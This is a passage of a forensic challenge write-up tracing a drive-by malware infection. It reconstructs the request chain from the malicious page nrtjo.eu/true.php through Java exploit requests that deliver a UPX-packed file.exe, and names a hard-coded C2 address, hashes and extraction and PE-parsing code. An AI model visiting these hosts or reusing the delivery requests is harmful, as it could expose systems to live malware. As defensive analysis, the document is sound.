00000290  43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72  |Control: no-stor|
000002a0  65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73  |e, no-cache, mus|
000002b0  74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 45 78  |t-revalidate..Ex|
000002c0  70 69 72 65 73 3a 20 54 68 75 2c 20 30 31 20 4a  |pires: Thu, 01 J|
000002d0  61 6e 20 32 30 30 30 20 30 30 3a 30 30 3a 30 30  |an 2000 00:00:00|
000002e0  20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66  | GMT..Last-Modif|
000002f0  69 65 64 3a 20 54 68 75 2c 20 30 31 20 4a 61 6e  |ied: Thu, 01 Jan|
00000300  20 32 30 30 30 20 30 30 3a 30 30 3a 30 30 20 47  | 2000 00:00:00 G|
00000310  4d 54 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63  |MT..Pragma: no-c|
00000320  61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 45 6e  |ache..Content-En|
00000330  63 6f 64 69 6e 67 3a 20 67 7a 69 70 0d 0a 0d 0a  |coding: gzip....|
00000340  34 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed  |489.............|
00000350  58 5b 6f db 36 14 7e 0f d0 ff 20 18 30 18 23 85  |X[o.6.~... .0.#.|
00000360  2d 91 12 e9 9b 3c 04 73 83 3e a4 18 8a 01 6d b6  |-....<.s.>....m.|
00000370  ac 0f b4 44 c7 4e 7c 51 25 da 8e f3 eb 47 9a 92  |...D.N|Q%....G..|
00000380  2b 2a b4 7c 49 52 14 d8 12 98 47 24 cf f5 3b e4  |+*.|IR....G$..;.|
00000390  91 c8 ee 88 4f 27 bd ee 60 1e ae 7b 67 dd 41 2c  |....O'..`..{g.A,|
000003a0  9a 24 88 c7 11 b7 f8 3a 62 3e e0 ec 91 37 ee e9  |.$.....:b>...7..|
000003b0  92 aa 51 60 25 71 e0 83 c7 c7 c7 ba f8 81 5e b7  |..Q`%q........^.|
000003c0  a1 c6 b7 62 bd 33 f1 b7 a4 b1 35 18 24 d4 07 a0  |...b.3....5.$...|
000003d0  73 76 96 8d 7c 49 fe 0c 2f d7 3e a8 a6 83 43 42  |sv..|I../.>...CB|
000003e0  88 cf 47 e3 24 ed 7a 9e                          |..G.$.z.|
000003e8

Reviewing the output from hexdump shows the client's first GET request is for a
file called "true.php" on a host named "nrtjo.eu". From this we can determine
the URL visited was http://nrtjo.eu/true.php. The server's response carries
"Content-Encoding: gzip", with the gzip data beginning at offset 0x345 (837
decimal), right after the "489" chunk-size line.
Using "dd" and "gzip" I was able to extract the content from the first stream
file with the following commands:

$ dd if=C0A81781-1061-3B355B66-80 of=true.php.gz bs=1 skip=837
$ gzip -d true.php.gz

The decompressed file, true.php, appears to contain heavily obfuscated
javascript and indicates this page invokes additional client requests for
content.

Ms. Moneymany visits http://nrtjo.eu/true.php (59.53.91.102 - china telecom)
  true.php - contains obfuscated javascript and requests additional content
  GET /xxx.xxx - (contains obfuscated javascript decoder?)
  GET /favicon.ico -- 404
  GET /q.jar
  GET /sdfg.jar
  GET //loading.php?spl=javadnw&J050006010 - (inline exe)
  GET //loading.php?spl=javad0 - (inline exe)

After observing this I believe we have the answer to question #3.

===============================================================================
Q3. What was the starting URL of this incident? In other words, on which URL
did Ms. Moneymany probably click?

A3. http://nrtjo.eu/true.php
===============================================================================

To find the answer to question #4 I continued examining the stream files with
hexdump and found 2 that returned content containing a reference to "file.exe".

$ hexdump -C -n 512 C0A81781-1066-3B355B66-80
00000000  47 45 54 20 2f 2f 6c 6f 61 64 69 6e 67 2e 70 68  |GET //loading.ph|
00000010  70 3f 73 70 6c 3d 6a 61 76 61 64 6e 77 26 4a 30  |p?spl=javadnw&J0|
00000020  35 30 30 30 36 30 31 30 20 48 54 54 50 2f 31 2e  |50006010 HTTP/1.|
00000030  31 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d  |1..User-Agent: M|
00000040  6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 57 69 6e 64  |ozilla/4.0 (Wind|
00000050  6f 77 73 20 58 50 20 35 2e 31 29 20 4a 61 76 61  |ows XP 5.1) Java|
00000060  2f 31 2e 36 2e 30 5f 30 35 0d 0a 48 6f 73 74 3a  |/1.6.0_05..Host:|
00000070  20 6e 72 74 6a 6f 2e 65 75 0d 0a 41 63 63 65 70  | nrtjo.eu..Accep|
00000080  74 3a 20 74 65 78 74 2f 68 74 6d 6c 2c 20 69 6d  |t: text/html, im|
00000090  61 67 65 2f 67 69 66 2c 20 69 6d 61 67 65 2f 6a  |age/gif, image/j|
000000a0  70 65 67 2c 20 2a 3b 20 71 3d 2e 32 2c 20 2a 2f  |peg, *; q=.2, */|
000000b0  2a 3b 20 71 3d 2e 32 0d 0a 43 6f 6e 6e 65 63 74  |*; q=.2..Connect|
000000c0  69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d  |ion: keep-alive.|
000000d0  0a 0d 0a 48 54 54 50 2f 31 2e 31 20 32 30 30 20  |...HTTP/1.1 200 |
000000e0  4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e  |OK..Server: ngin|
000000f0  78 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 31 37  |x..Date: Wed, 17|
00000100  20 4d 61 72 20 32 30 31 30 20 30 30 3a 35 36 3a  | Mar 2010 00:56:|
00000110  30 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d  |05 GMT..Content-|
00000120  54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f  |Type: applicatio|
00000130  6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a  |n/octet-stream..|
00000140  54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e  |Transfer-Encodin|
00000150  67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e  |g: chunked..Conn|
00000160  65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69  |ection: keep-ali|
00000170  76 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79  |ve..X-Powered-By|
00000180  3a 20 50 48 50 2f 35 2e 32 2e 31 31 0d 0a 43 6f  |: PHP/5.2.11..Co|
00000190  6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f  |ntent-Dispositio|
000001a0  6e 3a 20 69 6e 6c 69 6e 65 3b 20 66 69 6c 65 6e  |n: inline; filen|
000001b0  61 6d 65 3d 66 69 6c 65 2e 65 78 65 0d 0a 0d 0a  |ame=file.exe....|
000001c0  31 65 61 35 0d 0a 4d 5a 90 00 03 00 00 00 04 00  |1ea5..MZ........|
000001d0  00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00  |..............@.|
000001e0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|

$ hexdump -C -n 512 C0A81781-1067-3B355B66-80
00000000  47 45 54 20 2f 2f 6c 6f 61 64 69 6e 67 2e 70 68  |GET //loading.ph|
00000010  70 3f 73 70 6c 3d 6a 61 76 61 64 30 20 48 54 54  |p?spl=javad0 HTT|
00000020  50 2f 31 2e 31 0d 0a 55 73 65 72 2d 41 67 65 6e  |P/1.1..User-Agen|
00000030  74 3a 20 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28  |t: Mozilla/4.0 (|
00000040  57 69 6e 64 6f 77 73 20 58 50 20 35 2e 31 29 20  |Windows XP 5.1) |
00000050  4a 61 76 61 2f 31 2e 36 2e 30 5f 30 35 0d 0a 48  |Java/1.6.0_05..H|
00000060  6f 73 74 3a 20 6e 72 74 6a 6f 2e 65 75 0d 0a 41  |ost: nrtjo.eu..A|
00000070  63 63 65 70 74 3a 20 74 65 78 74 2f 68 74 6d 6c  |ccept: text/html|
00000080  2c 20 69 6d 61 67 65 2f 67 69 66 2c 20 69 6d 61  |, image/gif, ima|
00000090  67 65 2f 6a 70 65 67 2c 20 2a 3b 20 71 3d 2e 32  |ge/jpeg, *; q=.2|
000000a0  2c 20 2a 2f 2a 3b 20 71 3d 2e 32 0d 0a 43 6f 6e  |, */*; q=.2..Con|
000000b0  6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c  |nection: keep-al|
000000c0  69 76 65 0d 0a 0d 0a 48 54 54 50 2f 31 2e 31 20  |ive....HTTP/1.1 |
000000d0  32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20  |200 OK..Server: |
000000e0  6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 57 65 64  |nginx..Date: Wed|
000000f0  2c 20 31 37 20 4d 61 72 20 32 30 31 30 20 30 30  |, 17 Mar 2010 00|
00000100  3a 35 36 3a 31 30 20 47 4d 54 0d 0a 43 6f 6e 74  |:56:10 GMT..Cont|
00000110  65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63  |ent-Type: applic|
00000120  61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65  |ation/octet-stre|
00000130  61 6d 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63  |am..Transfer-Enc|
00000140  6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a  |oding: chunked..|
00000150  43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70  |Connection: keep|
00000160  2d 61 6c 69 76 65 0d 0a 58 2d 50 6f 77 65 72 65  |-alive..X-Powere|
00000170  64 2d 42 79 3a 20 50 48 50 2f 35 2e 32 2e 31 31  |d-By: PHP/5.2.11|
00000180  0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73  |..Content-Dispos|
00000190  69 74 69 6f 6e 3a 20 69 6e 6c 69 6e 65 3b 20 66  |ition: inline; f|
000001a0  69 6c 65 6e 61 6d 65 3d 66 69 6c 65 2e 65 78 65  |ilename=file.exe|
000001b0  0d 0a 0d 0a 31 65 61 35 0d 0a 4d 5a 90 00 03 00  |....1ea5..MZ....|
000001c0  00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00  |................|
000001d0  00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00  |..@.............|
000001e0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
000001f0  00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4  |................|

After identifying the stream files containing executable content I wasn't sure
how to extract it. I reviewed RFC 2616 again to gain a better understanding of
how "chunked" transfer encoding works. I considered using dd to extract the
individual chunks and manually splice them back together but found this to be
too tedious. Instead I wrote a small program in C to help with this task
called "xcte", which extracts chunked transfer encoding from reassembled TCP
stream files. Here is the code I wrote. This is highly experimental and lacks
error checking but seemed to get the job done and worked on both stream files.

/*******************************************************************************
 *
 * xcte.c - Extract Chunked Transfer-Encoding from TCP stream files
 *
 * Copyright (C) 2010 - Christian North
 *
 *******************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define version "v0.2 BETA"

/******************************************************************************/
void usage()
{
    printf("XCTE %s - ",version);
    printf("Extract Chunked Transfer-Encoding from TCP stream files\n");
    printf("Usage: xcte <streamfile>\n");
    exit(0);
}

/******************************************************************************/
/* Walk the stream one CRLF-terminated header line at a time looking for the
   chunked Transfer-Encoding header. Returns 1 (with the stream rewound) if it
   is present, 0 otherwise. */
int chunked_encoding(FILE *stream)
{
    const char *encoding="Transfer-Encoding: chunked";
    size_t len=1024;
    char data[len];
    long offset=0;
    int bytes=0;
    int c=0;

    while(!feof(stream)){
        if((bytes=fread(data,1,len,stream)) == 0) break;
        for(c=0;c<(bytes-1);c++){
            if(data[c] == 0x0D && data[c+1] == 0x0A){
                data[c]='\0';
                offset+=strlen(data)+2;
                break;
            }
        }
        if(strstr(data,encoding) != NULL) {
            rewind(stream);
            return 1;
        }
        fseek(stream,offset,SEEK_SET);
    }
    return 0;
}

/******************************************************************************/
/* If this header line is a Content-Disposition, open the file it names (append
   mode) and return it. Note that the name is used verbatim from the server's
   header, so xcte should only be run in a scratch directory. */
FILE *disposition(char *data)
{
    const char *disposition = "Content-Disposition";
    const char *filename = "filename=";
    FILE *fp = NULL;

    if(strstr(data,disposition) != NULL) {
        filename=strtok(data,"=");
        printf("Extracting Content: ");
        printf("%s\n",data+strlen(filename)+1);
        fp=fopen(data+strlen(filename)+1,"a");
        return fp;
    }
    return NULL;
}

/******************************************************************************/
/* Copy each chunk body to the content file. The stream is positioned on the
   CRLF that precedes the first chunk-size line, and every chunk is expected
   to look like "\r\n<4 hex digits>\r\n<data>"; chunk sizes of exactly four
   hex digits are all this version handles. Stops at the zero-length
   last-chunk. */
int extract(FILE *stream, FILE *content)
{
    size_t chunk=0;
    size_t len=8;
    char *fragment;
    char data[len];
    char hex[len];

    while(!feof(stream)){
        if(fread(data,1,len,stream) == 0) break;
        snprintf(hex,len,"%c%c%c%c",data[2],data[3],data[4],data[5]);
        chunk=strtoul(hex,NULL,16);
        if(chunk == 0) break;                     /* last-chunk reached */
        if((fragment = malloc(chunk)) == NULL) break;
        if(fread(fragment,1,chunk,stream) == 0) { free(fragment); break; }
        fwrite(fragment,1,chunk,content);
        free(fragment);
    }
    fclose(content);
    return 0;
}

/******************************************************************************/
int main(int argc, char **argv)
{
    char *streamfile=NULL;
    FILE *stream=NULL;
    FILE *content=NULL;
    size_t len=1024;
    char data[len];
    long offset=0;
    int bytes=0;
    int c=0;

    if(argc != 2) usage();
    streamfile = argv[1];
    if((stream = fopen(streamfile,"rb")) == NULL) usage();

    if(!chunked_encoding(stream)){
        printf("Transfer-Encoding: chunked - not found in ");
        printf("\"%s\"\n", streamfile);
        fclose(stream);
        exit(0);
    }

    /* Step through the header lines until the Content-Disposition line is
       found; offset tracks the file position of each line terminator. */
    while(!feof(stream)){
        if((bytes=fread(data,1,len,stream)) == 0) break;
        for(c=0;c<(bytes-1);c++){
            if(data[c] == 0x0D && data[c+1] == 0x0A) {
                data[c]='\0';
                offset++;
                break;
            }
            offset++;
        }
        content = disposition(data);
        if(content != NULL) break;
        fseek(stream,offset,SEEK_SET);
    }
    if(content == NULL){
        printf("Content-Disposition - not found in \"%s\"\n", streamfile);
        fclose(stream);
        exit(0);
    }

    /* Back up onto the CRLF of that line, then find the blank line (CRLFCRLF)
       that ends the headers: the chunked body starts right after it. */
    offset--;
    fseek(stream,offset,SEEK_SET);
    while(!feof(stream)){
        if((bytes=fread(data,1,len,stream)) == 0) break;
        for(c=0;c<(bytes-4);c++){
            if(data[c] == 0x0D && data[c+1] == 0x0A &&
               data[c+2] == 0x0D && data[c+3] == 0x0A ){
                offset+=2;
                fseek(stream,offset,SEEK_SET);
                extract(stream,content);
                fclose(stream);
                return 0;      /* stream is closed: do not test feof() on it */
            }
            offset++;
        }
    }
    fclose(stream);
    fclose(content);
    return 0;
}
/******************************************************************************/

After compiling this with "gcc -o xcte xcte.c" I was able to extract the
executables contained in both stream files that had references to "file.exe":

$ gcc -o xcte xcte.c
$ ./xcte C0A81781-1066-3B355B66-80
Extracting Content: file.exe
$ file file.exe
file.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
$ md5sum file.exe
5942ba36cf732097479c51986eee91ed  file.exe
$ rm file.exe
$ ./xcte C0A81781-1067-3B355B66-80
Extracting Content: file.exe
$ file file.exe
file.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
$ md5sum file.exe
5942ba36cf732097479c51986eee91ed  file.exe

The tail end of the checksum matches the hint for question #4.

===============================================================================
Q4. As part of the infection, a malicious Windows executable file was
downloaded onto Ms. Moneymany's system. What was the file's MD5 hash?
Hint: It ends on '91ed'.

A4. 5942ba36cf732097479c51986eee91ed
===============================================================================

Unfortunately I don't have a lot of experience with malware or packers so I
turned to Google and found a list of candidates. Using hexdump against the
executable file suggested the packer was UPX.
$ hexdump -C -n 1024 file.exe
00000000  4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00  |MZ..............|
00000010  b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  |........@.......|
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000030  00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00  |................|
00000040  0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68  |........!..L.!Th|
00000050  69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f  |is program canno|
00000060  74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20  |t be run in DOS |
00000070  6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00  |mode....$.......|
00000080  2b 97 33 0a 6f f6 5d 59 6f f6 5d 59 6f f6 5d 59  |+.3.o.]Yo.]Yo.]Y|
00000090  ac f9 00 59 67 f6 5d 59 48 30 30 59 6d f6 5d 59  |...Yg.]YH00Ym.]Y|
000000a0  6f f6 5c 59 2c f6 5d 59 36 d5 4e 59 6c f6 5d 59  |o.\Y,.]Y6.NYl.]Y|
000000b0  48 30 33 59 67 f6 5d 59 48 30 27 59 6e f6 5d 59  |H03Yg.]YH0'Yn.]Y|
000000c0  48 30 21 59 6e f6 5d 59 48 30 25 59 6e f6 5d 59  |H0!Yn.]YH0%Yn.]Y|
000000d0  52 69 63 68 6f f6 5d 59 00 00 00 00 00 00 00 00  |Richo.]Y........|
000000e0  00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00  |........PE..L...|
000000f0  96 25 99 4b 00 00 00 00 00 00 00 00 e0 00 03 01  |.%.K............|
00000100  0b 01 08 00 00 10 01 00 00 10 00 00 00 80 00 00  |................|
00000110  30 8f 01 00 00 90 00 00 00 a0 01 00 00 00 40 00  |0.............@.|
00000120  00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00  |................|
00000130  04 00 00 00 00 00 00 00 00 b0 01 00 00 10 00 00  |................|
00000140  00 00 00 00 02 00 00 04 00 00 10 00 00 10 00 00  |................|
00000150  00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00  |................|
00000160  c4 a2 01 00 78 00 00 00 84 a1 01 00 40 01 00 00  |....x.......@...|
00000170  00 a0 01 00 84 01 00 00 00 00 00 00 00 00 00 00  |................|
00000180  00 00 00 00 00 00 00 00 3c a3 01 00 0c 00 00 00  |........<.......|
00000190  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
*
000001e0  55 50 58 30 00 00 00 00 00 80 00 00 00 10 00 00  |UPX0............|
000001f0  00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00  |................|
00000200  00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00  |........UPX1....|
00000210  00 10 01 00 00 90 00 00 00 02 01 00 00 04 00 00  |................|
00000220  00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0  |............@...|
00000230  2e 72 73 72 63 00 00 00 00 10 00 00 00 a0 01 00  |.rsrc...........|
00000240  00 04 00 00 00 06 01 00 00 00 00 00 00 00 00 00  |................|
00000250  00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00  |....@...........|
00000260  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
*
000003d0  00 00 00 00 00 00 00 00 00 00 00 33 2e 30 34 00  |...........3.04.|
000003e0  55 50 58 21 0d 09 02 0a 48 ae 9d 34 9e c6 c6 02  |UPX!....H..4....|
000003f0  04 65 01 00 27 ff 00 00 00 42 01 00 26 02 00 2e  |.e..'....B..&...|
00000400

The dump is consistent with a UPX-packed PE32 file: e_lfanew at offset 0x3c is 0xe8, which is where "PE\0\0" sits; the file header there declares 3 sections and a 224-byte (0xe0) optional header, so the section table begins at 0xe8 + 4 + 20 + 224 = 0x1e0 and names the sections UPX0, UPX1 and .rsrc instead of the usual .text/.data; and the packer's own header, the version string "3.04" followed by the "UPX!" magic, follows the section table at 0x3db.

===============================================================================
Q5. What is the name of the packer used to protect the malicious Windows executable? Hint: This is one of the most popular freely-available packers seen in "mainstream" malware.
A5. UPX
===============================================================================

To answer question #6 I downloaded a copy of UPX and used it to decompress the executable "file.exe".

$ upx -d file.exe
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2009
UPX 3.04        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 27th 2009

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     82432 <-     68096   82.61%    win32/pe     file.exe

Unpacked 1 file.
$ md5sum file.exe
0f37839f48f7fc77e6d50e14657fb96e  file.exe

===============================================================================
Q6. What is the MD5 hash of the unpacked version of the malicious Windows executable file?
A6. 0f37839f48f7fc77e6d50e14657fb96e
===============================================================================

To find the last answer I needed to infect a Windows XP host and monitor where it tries to connect on the Internet. VMware proved to be an excellent tool for this task. I have an ESX server in my home lab that I used to create a new resource pool called "forensics". In this resource pool I created 2 virtual machines: one running Linux with Apache and a copy of my IP traffic analyzer, the other running Windows XP. These systems were isolated from the Internet but connected to each other. The Linux host was configured as the gateway for the Windows system. Next I placed a copy of file.exe in the default web root of the Linux server running Apache. On the Windows host I downloaded file.exe from the Linux server using a web browser. Then I started my IP traffic analyzer on the Linux host to monitor all network communications from the Windows host. On the Windows host I opened "file.exe" and monitored the output of the traffic analyzer on the Linux machine. Immediately a connection attempt was made to 213.155.29.144 on TCP/444.

This is also consistent with the capture itself: the single TCP/444 stream reassembled earlier, C0A81781-1068-D59B1D90-444, has the same destination, since the hex D5 9B 1D 90 in its name decodes to 213.155.29.144.

===============================================================================
Q7. The malicious executable attempts to connect to an Internet host using an IP address which is hard-coded into it (there was no DNS lookup). What is the IP address of that Internet host?
A7. 213.155.29.144
===============================================================================

This was a great puzzle! I had fun honing my forensic skills and learned a lot in the process. :)
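The chunked-body extraction behind Q4 is worth having as a stand-alone, testable routine, so here is an added example (written for this edit, not part of the original write-up or of xcte) of the decoder RFC 2616 section 3.6.1 describes, operating on a byte buffer rather than a FILE. It accepts chunk sizes of any number of hex digits, ignores chunk extensions, stops at the zero-length chunk, and reports a truncated capture or an undersized output buffer as an error instead of writing a silently short executable. The HTTP response it decodes is constructed for the example; only its first payload bytes are chosen to resemble the DOS header prefix seen in the dump above, and nothing in it comes from the contest capture.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Offset of the first body byte, just past the CRLFCRLF that ends the
 * headers, or -1 if the header block is incomplete. */
long http_body_offset(const uint8_t *in, size_t inlen)
{
    size_t i;
    for (i = 0; i + 4 <= inlen; i++)
        if (memcmp(in + i, "\r\n\r\n", 4) == 0)
            return (long)(i + 4);
    return -1;
}

/* Decode a chunked body: "<hex-size>[;ext]CRLF <data> CRLF" repeated and
 * ended by a zero-size chunk. Returns the decoded length, or -1 when the
 * body is malformed, truncated, or larger than the output buffer. */
long chunked_decode(const uint8_t *in, size_t inlen, uint8_t *out, size_t outcap)
{
    size_t pos = 0, outlen = 0;

    for (;;) {
        unsigned long size = 0;
        int digits = 0;

        while (pos < inlen && isxdigit(in[pos])) {          /* chunk-size */
            int c = tolower(in[pos]);
            size = size * 16 + (unsigned long)(isdigit(c) ? c - '0' : c - 'a' + 10);
            pos++;
            if (++digits > 8) return -1;                    /* absurd size: refuse */
        }
        if (digits == 0) return -1;                         /* no size where one is due */
        while (pos < inlen && in[pos] != '\r') pos++;       /* skip ";name=value" */
        if (pos + 2 > inlen || in[pos] != '\r' || in[pos + 1] != '\n') return -1;
        pos += 2;

        if (size == 0) break;                               /* last-chunk */
        if (size > inlen - pos) return -1;                  /* truncated capture */
        if (size > outcap - outlen) return -1;              /* output too small */
        memcpy(out + outlen, in + pos, size);
        outlen += size;
        pos += size;
        if (pos + 2 > inlen || in[pos] != '\r' || in[pos + 1] != '\n') return -1;
        pos += 2;                                           /* CRLF after chunk-data */
    }
    return (long)outlen;
}

/* Constructed sample response (not from the capture): three chunks whose
 * sizes have different digit counts, one carrying a chunk extension. */
static const unsigned char SAMPLE[] =
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Disposition: attachment; filename=file.exe\r\n"
    "Transfer-Encoding: chunked\r\n"
    "\r\n"
    "2\r\nMZ\r\n"
    "c;ext=1\r\n\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\r\n"
    "4\r\nPE\x00\x00\r\n"
    "0\r\n"
    "\r\n";

static const uint8_t EXPECTED[] = {
    'M', 'Z', 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
    0xff, 0xff, 'P', 'E', 0x00, 0x00 };

/* Decode SAMPLE's body into out; returns decoded length or -1. */
long demo_decode(uint8_t *out, size_t outcap)
{
    size_t inlen = sizeof(SAMPLE) - 1;
    long body = http_body_offset(SAMPLE, inlen);
    if (body < 0) return -1;
    return chunked_decode(SAMPLE + body, inlen - (size_t)body, out, outcap);
}

long demo_decoded_length(void) { uint8_t out[64]; return demo_decode(out, sizeof out); }

/* 1 if SAMPLE decodes to exactly EXPECTED (18 bytes), else 0. */
int demo_decodes_to_expected(void)
{
    uint8_t out[64];
    long n = demo_decode(out, sizeof out);
    return n == (long)sizeof(EXPECTED) && memcmp(out, EXPECTED, sizeof(EXPECTED)) == 0;
}

/* A capture that stops 12 bytes early, mid-body, must be reported (-1). */
long demo_truncated(void)
{
    uint8_t out[64];
    size_t inlen = sizeof(SAMPLE) - 1;
    long body = http_body_offset(SAMPLE, inlen);
    return chunked_decode(SAMPLE + body, inlen - (size_t)body - 12, out, sizeof out);
}

/* An output buffer smaller than the body must be reported (-1), not overrun. */
long demo_small_output(void) { uint8_t out[10]; return demo_decode(out, sizeof out); }

int main(void)
{
    printf("decoded %ld bytes, %s expected\n", demo_decoded_length(),
           demo_decodes_to_expected() ? "matches" : "differs from");
    printf("truncated capture -> %ld, small output buffer -> %ld\n",
           demo_truncated(), demo_small_output());
    return 0;
}
```

The two failure cases matter in forensics: a partially captured response decodes to a shorter file whose MD5 will never match anything, so the decoder refuses rather than guesses.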
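The UPX identification for Q5 was made by reading the section table out of a hexdump by eye. The following is an added example (not from the write-up) that does the same walk programmatically: it follows e_lfanew to the "PE\0\0" signature, reads NumberOfSections and SizeOfOptionalHeader, locates the section table, counts sections named UPX*, and looks for the "UPX!" packer header, bounds-checking every offset because the input is an untrusted malware sample. Since the real binary cannot be embedded here, build_pe() constructs a synthetic PE32 header with the same layout as the dump (e_lfanew 0xe8, 224-byte optional header, section table at 0x1e0); it is test data, not a real executable. Note the caveat: UPX section names and the "UPX!" marker are trivially altered by anyone repacking a sample, so their absence proves nothing, while their presence, as here, is a strong hint to try upx -d first.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define E_LFANEW_OFFSET     0x3c   /* DOS header field: file offset of "PE\0\0" */
#define FILE_HEADER_SIZE    20     /* IMAGE_FILE_HEADER */
#define SECTION_HEADER_SIZE 40     /* IMAGE_SECTION_HEADER */

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Locate the section table: e_lfanew -> "PE\0\0" -> IMAGE_FILE_HEADER ->
 * optional header of SizeOfOptionalHeader bytes -> section headers.
 * Returns NULL (and leaves *nsections untouched) if the layout is not sane. */
const uint8_t *pe_section_table(const uint8_t *buf, size_t len, int *nsections)
{
    uint32_t e_lfanew;
    uint16_t count, optsize;
    size_t table;

    if (len < E_LFANEW_OFFSET + 4 || buf[0] != 'M' || buf[1] != 'Z') return NULL;
    e_lfanew = rd32(buf + E_LFANEW_OFFSET);
    if (e_lfanew > len || len - e_lfanew < 4 + FILE_HEADER_SIZE) return NULL;
    if (memcmp(buf + e_lfanew, "PE\0\0", 4) != 0) return NULL;
    count   = rd16(buf + e_lfanew + 6);    /* NumberOfSections */
    optsize = rd16(buf + e_lfanew + 20);   /* SizeOfOptionalHeader */
    table   = (size_t)e_lfanew + 4 + FILE_HEADER_SIZE + optsize;
    if (count > 96 || table > len || (len - table) / SECTION_HEADER_SIZE < count) return NULL;
    *nsections = count;
    return buf + table;
}

/* Number of sections whose 8-byte name starts with "UPX" (UPX0, UPX1, UPX2);
 * -1 if the buffer does not parse as a PE file. */
int upx_section_count(const uint8_t *buf, size_t len)
{
    int n = 0, i, hits = 0;
    const uint8_t *sec = pe_section_table(buf, len, &n);
    if (sec == NULL) return -1;
    for (i = 0; i < n; i++)
        if (memcmp(sec + (size_t)i * SECTION_HEADER_SIZE, "UPX", 3) == 0) hits++;
    return hits;
}

/* File offset of the "UPX!" packer header (the version string, e.g. "3.04",
 * sits just before it in the dump above), or -1 if absent. */
long upx_magic_offset(const uint8_t *buf, size_t len)
{
    size_t i;
    for (i = 0; i + 4 <= len; i++)
        if (memcmp(buf + i, "UPX!", 4) == 0) return (long)i;
    return -1;
}

/* Build a minimal synthetic PE32 header (constructed test data, not a real
 * binary) with the dump's layout: e_lfanew 0xe8, 224-byte optional header,
 * section table at 0x1e0. Returns bytes written, 0 if cap is too small. */
size_t build_pe(uint8_t *out, size_t cap, const char *names[], int nsect, int with_upx_magic)
{
    size_t table = 0x1e0;
    size_t need = table + (size_t)nsect * SECTION_HEADER_SIZE + (with_upx_magic ? 9 : 0);
    int i;

    if (cap < need) return 0;
    memset(out, 0, need);
    out[0] = 'M'; out[1] = 'Z';
    out[E_LFANEW_OFFSET] = 0xe8;
    memcpy(out + 0xe8, "PE\0\0", 4);
    out[0xec] = 0x4c; out[0xed] = 0x01;        /* Machine = i386 */
    out[0xee] = (uint8_t)nsect;                /* NumberOfSections */
    out[0xfc] = 0xe0;                          /* SizeOfOptionalHeader = 224 */
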